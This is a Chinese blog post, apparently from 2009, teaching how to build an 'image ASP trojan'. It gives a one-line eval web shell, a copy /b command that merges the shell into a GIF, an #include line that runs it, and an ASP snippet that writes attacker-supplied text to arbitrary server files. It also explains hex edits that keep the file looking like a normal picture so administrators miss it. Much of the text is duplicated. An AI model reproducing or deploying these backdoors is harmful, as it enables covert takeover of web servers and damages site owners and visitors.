asp图片木马
[ 2009-09-26 08:36:16 | 作者: admin ]
作者:红魂浩天
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
然后我们新建一个asp文件,在里面写入<!--#include file="asp.gif"-->,当然你也可以把它插入到任何asp文件的头部或者尾部,仅仅就这一句话。asp.gif就是冰狐浪子asp木马服务端,也是一句话,这个图片asp木马就做好了。
不过这里还有一个小问题,虽然网站里图片很多,但如果管理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢?
为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件!
二、copy给我们加油
把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。
再启动windows下的dos窗口,键入copy 1.gif /b + asp.asp /a asp.gif
其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注意文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp木马服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,请插入下面代码
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<!--#include file="UploadFile/asp.gif"-->
<% end if %>
这里我们用一个id参数来蔽掉了,图片所产生的乱码。
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=1288
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
然后我们新建一个asp文件,在里面写入<!--#include file="asp.gif"-->,当然你也可以把它插入到任何asp文件的头部或者尾部,仅仅就这一句话。asp.gif就是冰狐浪子asp木马服务端,也是一句话,这个图片asp木马就做好了。
不过这里还有一个小问题,虽然网站里图片很多,但如果管理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢?
为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件!
二、copy给我们加油
把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。
再启动windows下的dos窗口,键入copy 1.gif /b + asp.asp /a asp.gif
其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注意文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp木马服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,请插入下面代码
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<!--#include file="UploadFile/asp.gif"-->
<% end if %>
这里我们用一个id参数来蔽掉了,图片所产生的乱码。
引用
一般的图片ASP木马 不能显示图片。这样很容易被管理员发现的。。今天我就交大家如何制作可以显示图片的ASP木马!
首先我们来看以下不能显示图片的ASP木马!这种木马简单
注意两点:
1:必须有一个ASP文件包含该 ASP图片木马!
2:ASP图片木马必须要在木马的开始先用VB声明:
<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
首先我们来看以下今天我要做的ASP显图片的木马!
需要工具:UltraEdit32
一个图片文件1.jpg
还有我们的木马文件:这里我们用冰狐浪子的
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
----------------------------------------
UltraEdit 打开图片文件
UltraEdit新建一个文件。把你要插入图片的ASP代码[ASP木马] 写进去--进行编译! 然后复制到图片中
为了确保木马成功这里我们 替换掉图片里的<% 以及 %> 这里大家看到%> 是25 3E我们把 25随便替换,我们替换成00 继续找下一个。一直替换完毕!(不要替换自己ASP的就可以)
保存:我们来看看我的保存的,具有显示图片功能的ASP木马!大家看到了,这样可以正常显示图片!
然后我们需要建一个ASP文件把这个图片 包含进去!这里我已经写好了1.asp 我们浏览以下
我们在测试以下 能不能做为木马使用! OK了 呵呵
我们在测试以下写入文件!
首先我们来看以下不能显示图片的ASP木马!这种木马简单
注意两点:
1:必须有一个ASP文件包含该 ASP图片木马!
2:ASP图片木马必须要在木马的开始先用VB声明:
<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
首先我们来看以下今天我要做的ASP显图片的木马!
需要工具:UltraEdit32
一个图片文件1.jpg
还有我们的木马文件:这里我们用冰狐浪子的
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
----------------------------------------
UltraEdit 打开图片文件
UltraEdit新建一个文件。把你要插入图片的ASP代码[ASP木马] 写进去--进行编译! 然后复制到图片中
为了确保木马成功这里我们 替换掉图片里的<% 以及 %> 这里大家看到%> 是25 3E我们把 25随便替换,我们替换成00 继续找下一个。一直替换完毕!(不要替换自己ASP的就可以)
保存:我们来看看我的保存的,具有显示图片功能的ASP木马!大家看到了,这样可以正常显示图片!
然后我们需要建一个ASP文件把这个图片 包含进去!这里我已经写好了1.asp 我们浏览以下
我们在测试以下 能不能做为木马使用! OK了 呵呵
我们在测试以下写入文件!
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=1288
这篇日志没有评论。
此日志不可发表评论。
